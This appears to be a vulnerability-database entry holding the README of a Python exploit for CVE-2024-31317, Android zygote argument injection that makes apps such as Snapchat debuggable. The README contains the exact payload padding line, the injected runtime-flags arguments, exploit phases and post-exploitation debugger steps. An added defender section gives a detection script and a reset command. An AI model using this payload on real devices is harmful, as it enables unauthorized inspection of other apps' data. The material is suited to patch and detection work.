
PoC details: 8f07532b9ffe460a08a648369e89a76ca161df44

Source
Related vulnerability
Title: Google Android security vulnerability (CVE-2024-31317)
Description: Google Android is a Linux-based open-source operating system from Google (US). Google Android contains a security vulnerability caused by unsafe deserialization in multiple methods of the ZygoteProcess.java file; it may allow code execution as any application via WRITE_SECURE_SETTINGS.
Description
CVE-2024-31317 Debuggable App Exploit
Introduction
# CVE-2024-31317 Debuggable App Exploit

A Python-based exploit for CVE-2024-31317 (Android Zygote Injection) that makes any installed Android app debuggable by injecting malicious zygote arguments through the `hidden_api_blacklist_exemptions` setting.

## Overview

This exploit leverages a command injection vulnerability in Android's Zygote process to start target applications with the `debuggable` flag enabled. This allows JDWP debugging and inspection of any app without needing root access or the app's debug version.

**Based on the research from:** [Flanker's CVE-2024-31317 Analysis](https://blog.flanker017.me/cve-2024-31317/)

Key insight: *"the runtime-flags field in ZygoteArguments can actually be used to enable an application's debuggable attribute."*

## Features

- **Auto-detection mode** - Automatically detects target app's UID, instruction set, and data directory
- **Debuggable flag injection** - Sets `runtime-flags=65535` to enable debugging
- **JDWP forwarding** - Automatically sets up JDWP port forwarding after exploit
- **Logcat monitoring** - Shows app logs after successful exploitation
- **Clean startup** - Ensures debug app is fully closed before starting
- **Auto-install debug app** - Installs helper app if not present

## Requirements

- Android device vulnerable to CVE-2024-31317 (pre-June 2024 security patch)
- ADB installed and USB debugging enabled
- Python 3.10+

## Installation

Place the following files in the same directory:
- `CVE-2024-31317-Debuggable.py` (main exploit)
- `jdwplib.py` (JDWP client library)
- `app-debug.apk` (debuggable helper app)
- `win32/adb.exe` (Windows) or ensure `adb` is in PATH

## Usage

### Basic Usage

```bash
python CVE-2024-31317-Debuggable.py
```

The script will prompt you to select a configuration mode:

```
Configuration Mode:
  [1] Auto-detect app parameters (UID, instruction-set, data-dir)
  [2] Use hardcoded values (faster, less reliable)

Select mode (1/2) [default: 1]:
```

### What it does

1. **Phase 1: Extract startSeq**
   - Starts a debuggable helper app (F-Droid or custom debug app)
   - Connects via JDWP and extracts the `startSeq` value from stack frames
   - Closes the helper app

2. **Phase 2: Inject Zygote Arguments**
   - Builds malicious zygote arguments with `runtime-flags=65535` (debuggable)
   - Injects payload into `hidden_api_blacklist_exemptions` setting
   - Force-stops and restarts target app with injected arguments

3. **Post-Exploitation**
   - Shows logcat entries for target app
   - Sets up JDWP port forwarding
   - Provides local port for debugger connection

### Example Output

```
[INFO] ======================================================================
[INFO] CVE-2024-31317 Debuggable App Exploit
[INFO] ======================================================================
[INFO] Using auto-detect mode
[INFO] Closing debug app
[INFO] App com.debug.app is already installed
[INFO] Phase 1: Starting debug application to extract startSeq
[INFO] Process started with PID: 12345
[INFO] JDWP forwarded to local port: 8700
[INFO] Found main thread
[INFO] Found startSeq in frame 5
[INFO] startSeq value: 123456
[INFO] Closing debug app
[INFO] Phase 2: Exploiting com.snapchat.android
[INFO] Auto-detecting parameters for com.snapchat.android
[INFO] Detected UID/GID: 10242
[INFO] Detected instruction set: arm64
[INFO] Detected data directory: /data/user/0/com.snapchat.android
[INFO] Payload size: 8765 bytes
[INFO] Exploit completed successfully
[INFO] Target app PID: 23456
[INFO] JDWP forwarded to local port: 8701
[INFO] You can now connect a JDWP debugger to port 8701
```

## Configuration

### Target App

Edit the `main()` function to change the target app:

```python
target_app = "com.snapchat.android"  # Change to your target package
debug_app = "com.debug.app"          # Helper debuggable app
debug_apk = "app-debug.apk"          # APK file for helper app
```

### Auto-detect vs Hardcoded

**Auto-detect mode (recommended):**
- Uses `pm list packages -U` to get UID
- Uses `dumpsys package` to get instruction set and data directory
- More reliable across different devices

**Hardcoded mode:**
- Uses default values (UID=10242, arm64, etc.)
- Faster, but only stable when the hardcoded values match the device's original zygote arguments

## After Exploitation

Once the exploit succeeds, the target app is running with debugging enabled. You can:

1. **Connect with JDWP debugger:**
   ```bash
   jdb -attach localhost:8701
   ```
2. **Use Android Studio debugger** - attach to process on the forwarded port
3. **Use Frida** (if gadget is injected via jdwp script)

## Files

- `CVE-2024-31317-Debuggable.py` - Main exploit script
- `jdwplib.py` - Java Debug Wire Protocol client library
- `app-debug.apk` - Minimal debuggable helper app

## How It Works

### Vulnerability Overview

CVE-2024-31317 is a command injection vulnerability in Android's Zygote process. By manipulating the `hidden_api_blacklist_exemptions` system setting with specially crafted input, we can inject arbitrary zygote arguments when an app starts.

### Key Components

1. **startSeq Extraction**: Every app launch has a unique sequence number. We extract this from a debuggable app via JDWP.

2. **Payload Construction**: We build zygote arguments including:
   ```
   --runtime-flags=65535  # Enables all debug flags including debuggable
   --setuid=<target_uid>
   --package-name=<target_app>
   seq=<startSeq+1>
   ```

3. **Injection**: Payload is injected into the system setting with specific padding for Android 12+:
   ```python
   payload = "\n" * 3000 + "A" * 5157 + zygote_arguments + "," + ",\n" * 1400
   ```

4. **Trigger**: Force-stop and restart the target app, which launches with our injected arguments.

## Limitations

- Only works on devices vulnerable to CVE-2024-31317 (pre-June 2024)
- Not a root exploit - only provides debuggable access
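The "How It Works" and "Limitations" sections above give a defender two concrete things to check on a device they administer: whether the security patch level predates the June 2024 fix, and whether the global `hidden_api_blacklist_exemptions` setting still holds a legitimate comma-separated list of hidden-API signatures or has been stuffed with newlines and zygote command-line options. The following triage script is an added example and is not part of this repository or of Flanker's writeup; the function names (`triage`, `inspect_exemptions`, `patch_level_vulnerable`), the 2024-06-01 cutoff, the descriptor heuristic and the sample values are all this example's own assumptions. It runs offline on constructed inputs and can optionally read live values over `adb`.

```python
"""Defender-side triage for CVE-2024-31317 exposure (added example, not project code).

Given the device's security patch level and the current value of the global
hidden_api_blacklist_exemptions setting, report whether the device is in the
vulnerable window and whether the setting looks tampered with.
"""
import re
from datetime import date
from typing import Optional

# Assumption: patch levels dated 2024-06-01 or later are treated as fixed
# (the README names the June 2024 security patch as the boundary).
FIXED_PATCH_LEVEL = date(2024, 6, 1)

# Strings that belong in a zygote argument list, never in a list of
# hidden-API signatures. Taken from the payload shape shown in the README.
ZYGOTE_ARG_MARKERS = ("--runtime-flags=", "--setuid=", "--package-name=", "seq=")


def parse_patch_level(value: str) -> Optional[date]:
    """Parse ro.build.version.security_patch (YYYY-MM-DD); None if malformed."""
    m = re.fullmatch(r"(\d{4})-(\d{2})-(\d{2})", value.strip())
    if not m:
        return None
    year, month, day = (int(g) for g in m.groups())
    try:
        return date(year, month, day)
    except ValueError:
        return None


def patch_level_vulnerable(value: str) -> bool:
    """True when the patch level predates the fix or cannot be parsed (fail closed)."""
    level = parse_patch_level(value)
    return level is None or level < FIXED_PATCH_LEVEL


def inspect_exemptions(setting: Optional[str]) -> list:
    """Return reasons the exemption setting looks injected; empty list means clean.

    A legitimate value is 'null', empty, or a comma-separated list of dex
    descriptors / descriptor prefixes such as 'Landroid/os/Foo;->bar(I)V'.
    Those never contain whitespace, newlines or '=' characters.
    """
    reasons = []
    if setting is None or setting.strip() in ("", "null"):
        return reasons
    if "\n" in setting:
        reasons.append("contains newline characters")
    for marker in ZYGOTE_ARG_MARKERS:
        if marker in setting:
            reasons.append(f"contains zygote argument marker {marker!r}")
    # Heuristic (assumption): every non-empty entry must look like a dex
    # class/member descriptor or a prefix of one, i.e. start with 'L' and
    # contain no whitespace, comma or '='.
    entries = [e for e in setting.split(",") if e.strip()]
    malformed = [e for e in entries if not re.fullmatch(r"L[^\s,=]*", e.strip())]
    if malformed:
        reasons.append(f"{len(malformed)} entries are not dex class/member descriptors")
    return reasons


def triage(patch_level: str, setting: Optional[str]) -> dict:
    """Combine both checks into a single verdict dictionary."""
    exposed = patch_level_vulnerable(patch_level)
    findings = inspect_exemptions(setting)
    if exposed and findings:
        verdict = "exposed: injected zygote arguments present"
    elif exposed:
        verdict = "exposed: patch level predates fix, setting looks clean"
    elif findings:
        verdict = "patched, but setting is still tampered: reset it"
    else:
        verdict = "ok"
    return {"exposed": exposed, "findings": findings, "verdict": verdict}


def collect_via_adb() -> dict:
    """Read both values from the attached device (assumes adb is in PATH)."""
    import subprocess

    def sh(*args):
        out = subprocess.run(["adb", "shell", *args], capture_output=True,
                             text=True, check=True)
        return out.stdout.strip()

    return triage(sh("getprop", "ro.build.version.security_patch"),
                  sh("settings", "get", "global", "hidden_api_blacklist_exemptions"))


# Constructed sample values (not captured from a real device).
CLEAN_SETTING = "Landroid/os/Foo;->bar(I)V,Landroid/os/Baz;->qux()V"
INJECTED_SETTING = ("\n" * 3 + "A" * 5
                    + "--runtime-flags=65535 --setuid=10242 "
                      "--package-name=com.example.target seq=7"
                    + "," + ",\n" * 2)

if __name__ == "__main__":
    for label, lvl, val in (("old device, clean", "2024-05-05", CLEAN_SETTING),
                            ("old device, injected", "2024-05-05", INJECTED_SETTING),
                            ("patched device", "2024-06-01", "null")):
        print(label, "->", triage(lvl, val)["verdict"])
```

If the setting is flagged on a device you administer, `adb shell settings delete global hidden_api_blacklist_exemptions` restores the default, and the patch-level finding is only resolved by applying the June 2024 (or later) security update. The descriptor heuristic is deliberately loose so that prefix-style exemptions such as `Landroid/` are not reported; the presence of newlines or zygote option strings is the decisive signal.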

## Credits

- **[Flanker (flanker017)](https://blog.flanker017.me/)** - Original research and writeup on CVE-2024-31317
- **typlo** - Code snippets for finding startSeq via JDWP
- **[Anonymous941](https://github.com/Anonymous941/zygote-injection-toolkit)** - Zygote injection toolkit reference
- **Meta X Red Team** - Original vulnerability disclosure

## References

- [CVE-2024-31317 Detailed Analysis](https://blog.flanker017.me/cve-2024-31317/)
- [Meta Security Advisory](https://rtx.meta.security/exploitation/2024/06/03/Android-Zygote-injection.html)
- [InfoSec Writeup](https://infosecwriteups.com/exploiting-android-zygote-injection-cve-2024-31317-d83f69265088)
- [Anonymous941's Toolkit](https://github.com/Anonymous941/zygote-injection-toolkit)

## Disclaimer

This tool is for educational and research purposes only. Only use this on devices you own or have explicit permission to test. Unauthorized access to computer systems is illegal.

## License

MIT License - See LICENSE file for details

File snapshot

```
[4.0K] /data/pocs/8f07532b9ffe460a08a648369e89a76ca161df44
├── [9.0M] app-debug.apk
├── [ 18K] CVE-2024-31317-Debuggable.py
├── [ 24K] jdwplib.py
├── [6.9K] README.md
└── [4.0K] win32
    ├── [5.7M] adb.exe
    ├── [ 96K] AdbWinApi.dll
    └── [ 62K] AdbWinUsbApi.dll

2 directories, 7 files
```